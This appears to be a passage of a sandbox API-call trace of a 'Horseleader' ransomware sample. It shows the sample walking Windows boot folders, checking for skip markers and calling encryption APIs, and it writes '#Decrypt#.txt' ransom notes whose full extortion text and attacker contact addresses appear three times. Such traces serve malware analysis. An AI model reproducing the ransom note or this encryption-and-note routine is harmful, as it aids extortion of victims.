[0125.015] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.015] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0125.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.016] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.016] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.016] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0125.016] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.016] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.016] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.016] lstrlenW (lpString=".testttjffg") returned 11 [0125.016] StrStrW (lpFirst="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.016] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.017] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.017] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.042] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.043] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.043] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\#Decrypt#.txt") returned 31 [0125.043] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\#Decrypt#.txt" (normalized: "c:\\boot\\zh-cn\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.044] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.044] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.046] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.046] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.047] CloseHandle (hObject=0x1dc) returned 1 [0125.047] GetProcessHeap () returned 0x780000 [0125.047] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.047] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0125.047] lstrcmpiW (lpString1="zh-HK", lpString2="Windows") returned 1 [0125.047] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0125.048] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0125.048] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0125.048] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-HK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.048] GetProcessHeap () returned 0x780000 [0125.048] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.048] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0125.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.049] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0125.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.049] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.049] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0125.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.049] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.049] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.050] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0125.050] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.050] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.050] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.050] lstrlenW (lpString=".testttjffg") returned 11 [0125.050] StrStrW (lpFirst="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.050] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.050] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.051] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.051] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.051] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.051] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\#Decrypt#.txt") returned 31 [0125.051] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\#Decrypt#.txt" (normalized: "c:\\boot\\zh-hk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.052] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.052] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.053] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0125.053] WriteFile (in: hFile=0x1dc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0125.054] CloseHandle (hObject=0x1dc) returned 1 [0125.054] GetProcessHeap () returned 0x780000 [0125.054] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0125.054] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0125.054] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0125.054] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0125.054] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0125.055] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0125.055] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\zh-TW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0125.055] GetProcessHeap () returned 0x780000 [0125.055] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0125.055] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0125.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0125.056] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0125.056] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0125.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0125.056] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0125.057] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0125.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0125.057] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0125.057] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0125.057] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0125.057] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0125.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0125.057] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0125.058] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0125.058] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0125.058] lstrlenW (lpString=".testttjffg") returned 11 [0125.058] StrStrW (lpFirst="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0125.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0125.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0125.058] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.059] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0125.059] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0125.059] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\#Decrypt#.txt") returned 31 [0125.059] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\#Decrypt#.txt" (normalized: "c:\\boot\\zh-tw\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0125.061] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0125.061] WriteFile (in: hFile=0x1dc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0125.063] lstrlenA 